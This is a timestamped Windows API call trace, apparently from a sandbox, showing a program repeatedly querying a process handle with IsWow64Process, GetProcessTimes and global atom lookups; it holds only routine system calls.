	[0136.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.749] CloseHandle (hObject=0x2dc) returned 1
	[0136.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.749] CloseHandle (hObject=0x2dc) returned 1
	[0136.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.749] CloseHandle (hObject=0x2dc) returned 1
	[0136.749] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.750] CloseHandle (hObject=0x2dc) returned 1
	[0136.750] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.750] CloseHandle (hObject=0x2dc) returned 1
	[0136.750] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.750] CloseHandle (hObject=0x2dc) returned 1
	[0136.750] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.750] CloseHandle (hObject=0x2dc) returned 1
	[0136.750] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.750] CloseHandle (hObject=0x2dc) returned 1
	[0136.751] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.751] CloseHandle (hObject=0x2dc) returned 1
	[0136.751] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.751] CloseHandle (hObject=0x2dc) returned 1
	[0136.751] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.751] CloseHandle (hObject=0x2dc) returned 1
	[0136.751] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.751] CloseHandle (hObject=0x2dc) returned 1
	[0136.752] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.752] CloseHandle (hObject=0x2dc) returned 1
	[0136.752] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.752] CloseHandle (hObject=0x2dc) returned 1
	[0136.752] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.752] CloseHandle (hObject=0x2dc) returned 1
	[0136.753] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.753] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.753] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.753] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.754] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.754] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.754] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.754] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.754] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.754] CloseHandle (hObject=0x2dc) returned 1
	[0136.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.754] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.755] CloseHandle (hObject=0x2dc) returned 1
	[0136.755] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.755] CloseHandle (hObject=0x2dc) returned 1
	[0136.755] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.755] CloseHandle (hObject=0x2dc) returned 1
	[0136.755] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.755] CloseHandle (hObject=0x2dc) returned 1
	[0136.756] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.756] CloseHandle (hObject=0x2dc) returned 1
	[0136.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.788] CloseHandle (hObject=0x2dc) returned 1
	[0136.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.789] CloseHandle (hObject=0x2dc) returned 1
	[0136.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.789] CloseHandle (hObject=0x2dc) returned 1
	[0136.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.789] CloseHandle (hObject=0x2dc) returned 1
	[0136.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.789] CloseHandle (hObject=0x2dc) returned 1
	[0136.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.790] CloseHandle (hObject=0x2dc) returned 1
	[0136.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.790] CloseHandle (hObject=0x2dc) returned 1
	[0136.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.790] CloseHandle (hObject=0x2dc) returned 1
	[0136.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.790] CloseHandle (hObject=0x2dc) returned 1
	[0136.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.791] CloseHandle (hObject=0x2dc) returned 1
	[0136.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.791] CloseHandle (hObject=0x2dc) returned 1
	[0136.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.791] CloseHandle (hObject=0x2dc) returned 1
	[0136.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.791] CloseHandle (hObject=0x2dc) returned 1
	[0136.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.792] CloseHandle (hObject=0x2dc) returned 1
	[0136.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.792] CloseHandle (hObject=0x2dc) returned 1
	[0136.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.792] CloseHandle (hObject=0x2dc) returned 1
	[0136.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.792] CloseHandle (hObject=0x2dc) returned 1
	[0136.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.792] CloseHandle (hObject=0x2dc) returned 1
	[0136.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.793] CloseHandle (hObject=0x2dc) returned 1
	[0136.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.793] CloseHandle (hObject=0x2dc) returned 1
	[0136.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.793] CloseHandle (hObject=0x2dc) returned 1
	[0136.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.793] CloseHandle (hObject=0x2dc) returned 1
	[0136.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.794] CloseHandle (hObject=0x2dc) returned 1
	[0136.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.794] CloseHandle (hObject=0x2dc) returned 1
	[0136.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.794] CloseHandle (hObject=0x2dc) returned 1
	[0136.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.794] CloseHandle (hObject=0x2dc) returned 1
	[0136.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.794] CloseHandle (hObject=0x2dc) returned 1
	[0136.795] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.795] CloseHandle (hObject=0x2dc) returned 1
	[0136.795] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.795] CloseHandle (hObject=0x2dc) returned 1
	[0136.795] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.795] CloseHandle (hObject=0x2dc) returned 1
	[0136.796] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.796] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.796] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.796] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.796] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.796] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.797] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.797] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.797] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.797] CloseHandle (hObject=0x2dc) returned 1
	[0136.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.797] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.797] CloseHandle (hObject=0x2dc) returned 1
	[0136.797] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.797] CloseHandle (hObject=0x2dc) returned 1
	[0136.798] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.798] CloseHandle (hObject=0x2dc) returned 1
	[0136.798] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.798] CloseHandle (hObject=0x2dc) returned 1
	[0136.798] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.798] CloseHandle (hObject=0x2dc) returned 1
	[0136.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.831] CloseHandle (hObject=0x2dc) returned 1
	[0136.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.831] CloseHandle (hObject=0x2dc) returned 1
	[0136.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.831] CloseHandle (hObject=0x2dc) returned 1
	[0136.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.831] CloseHandle (hObject=0x2dc) returned 1
	[0136.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.832] CloseHandle (hObject=0x2dc) returned 1
	[0136.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.832] CloseHandle (hObject=0x2dc) returned 1
	[0136.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.832] CloseHandle (hObject=0x2dc) returned 1
	[0136.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.832] CloseHandle (hObject=0x2dc) returned 1
	[0136.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.833] CloseHandle (hObject=0x2dc) returned 1
	[0136.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.833] CloseHandle (hObject=0x2dc) returned 1
	[0136.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.833] CloseHandle (hObject=0x2dc) returned 1
	[0136.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.833] CloseHandle (hObject=0x2dc) returned 1
	[0136.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.834] CloseHandle (hObject=0x2dc) returned 1
	[0136.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.834] CloseHandle (hObject=0x2dc) returned 1
	[0136.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.834] CloseHandle (hObject=0x2dc) returned 1
	[0136.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.834] CloseHandle (hObject=0x2dc) returned 1
	[0136.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.835] CloseHandle (hObject=0x2dc) returned 1
	[0136.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.835] CloseHandle (hObject=0x2dc) returned 1
	[0136.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.835] CloseHandle (hObject=0x2dc) returned 1
	[0136.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.835] CloseHandle (hObject=0x2dc) returned 1
	[0136.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.835] CloseHandle (hObject=0x2dc) returned 1
	[0136.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.836] CloseHandle (hObject=0x2dc) returned 1
	[0136.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.836] CloseHandle (hObject=0x2dc) returned 1
	[0136.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.836] CloseHandle (hObject=0x2dc) returned 1
	[0136.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.836] CloseHandle (hObject=0x2dc) returned 1
	[0136.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.837] CloseHandle (hObject=0x2dc) returned 1
	[0136.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.837] CloseHandle (hObject=0x2dc) returned 1
	[0136.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.837] CloseHandle (hObject=0x2dc) returned 1
	[0136.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.837] CloseHandle (hObject=0x2dc) returned 1
	[0136.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.838] CloseHandle (hObject=0x2dc) returned 1
	[0136.838] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.838] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.838] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.839] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.839] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.839] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.839] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.839] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.839] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.839] CloseHandle (hObject=0x2dc) returned 1
	[0136.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.840] CloseHandle (hObject=0x2dc) returned 1
	[0136.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.840] CloseHandle (hObject=0x2dc) returned 1
	[0136.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.840] CloseHandle (hObject=0x2dc) returned 1
	[0136.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.841] CloseHandle (hObject=0x2dc) returned 1
	[0136.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.841] CloseHandle (hObject=0x2dc) returned 1
	[0136.922] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.922] CloseHandle (hObject=0x2dc) returned 1
	[0136.922] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.922] CloseHandle (hObject=0x2dc) returned 1
	[0136.922] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.922] CloseHandle (hObject=0x2dc) returned 1
	[0136.922] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.922] CloseHandle (hObject=0x2dc) returned 1
	[0136.923] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.923] CloseHandle (hObject=0x2dc) returned 1
	[0136.923] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.923] CloseHandle (hObject=0x2dc) returned 1
	[0136.923] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.923] CloseHandle (hObject=0x2dc) returned 1
	[0136.923] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.923] CloseHandle (hObject=0x2dc) returned 1
	[0136.924] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.924] CloseHandle (hObject=0x2dc) returned 1
	[0136.924] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.924] CloseHandle (hObject=0x2dc) returned 1
	[0136.924] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.924] CloseHandle (hObject=0x2dc) returned 1
	[0136.924] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.924] CloseHandle (hObject=0x2dc) returned 1
	[0136.925] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.925] CloseHandle (hObject=0x2dc) returned 1
	[0136.925] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.925] CloseHandle (hObject=0x2dc) returned 1
	[0136.925] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.925] CloseHandle (hObject=0x2dc) returned 1
	[0136.925] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.925] CloseHandle (hObject=0x2dc) returned 1
	[0136.926] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.926] CloseHandle (hObject=0x2dc) returned 1
	[0136.933] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.933] CloseHandle (hObject=0x2dc) returned 1
	[0136.933] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.933] CloseHandle (hObject=0x2dc) returned 1
	[0136.933] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.933] CloseHandle (hObject=0x2dc) returned 1
	[0136.933] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.933] CloseHandle (hObject=0x2dc) returned 1
	[0136.934] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.934] CloseHandle (hObject=0x2dc) returned 1
	[0136.934] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.934] CloseHandle (hObject=0x2dc) returned 1
	[0136.934] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.934] CloseHandle (hObject=0x2dc) returned 1
	[0136.934] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.934] CloseHandle (hObject=0x2dc) returned 1
	[0136.935] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.935] CloseHandle (hObject=0x2dc) returned 1
	[0136.935] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.935] CloseHandle (hObject=0x2dc) returned 1
	[0136.935] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.935] CloseHandle (hObject=0x2dc) returned 1
	[0136.935] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.935] CloseHandle (hObject=0x2dc) returned 1
	[0136.936] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.936] CloseHandle (hObject=0x2dc) returned 1
	[0136.936] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.936] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.936] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.937] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.937] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.937] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.937] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.937] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.937] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.937] CloseHandle (hObject=0x2dc) returned 1
	[0136.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.938] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.938] CloseHandle (hObject=0x2dc) returned 1
	[0136.938] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.938] CloseHandle (hObject=0x2dc) returned 1
	[0136.938] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.938] CloseHandle (hObject=0x2dc) returned 1
	[0136.939] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.939] CloseHandle (hObject=0x2dc) returned 1
	[0136.939] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.939] CloseHandle (hObject=0x2dc) returned 1
	[0136.972] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.972] CloseHandle (hObject=0x2dc) returned 1
	[0136.972] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.972] CloseHandle (hObject=0x2dc) returned 1
	[0136.972] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.973] CloseHandle (hObject=0x2dc) returned 1
	[0136.973] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.973] CloseHandle (hObject=0x2dc) returned 1
	[0136.973] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.973] CloseHandle (hObject=0x2dc) returned 1
	[0136.973] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.973] CloseHandle (hObject=0x2dc) returned 1
	[0136.974] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.974] CloseHandle (hObject=0x2dc) returned 1
	[0136.974] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.974] CloseHandle (hObject=0x2dc) returned 1
	[0136.974] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.974] CloseHandle (hObject=0x2dc) returned 1
	[0136.974] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.974] CloseHandle (hObject=0x2dc) returned 1
